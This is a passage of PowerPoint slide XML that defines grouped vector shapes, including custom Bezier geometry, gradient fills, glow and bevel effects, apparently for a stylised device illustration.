                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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Freeform 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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ounded Rectangle 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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ounded Rectangle 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="59" name="Group 58"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5034012" y="4363204"/>
            <a:ext cx="1122431" cy="1879830"/>
            <a:chOff x="2266051" y="1450709"/>
            <a:chExt cx="2198318" cy="3681709"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Rectangle 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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Trapezoid 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2582053" y="1450709"/>
              <a:ext cx="1566316" cy="1686284"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 23881"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="74000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="41000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="39000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="92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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="139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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Rectangle 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2671935" y="1503488"/>
              <a:ext cx="1386550" cy="1506594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alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:alpha val="74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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
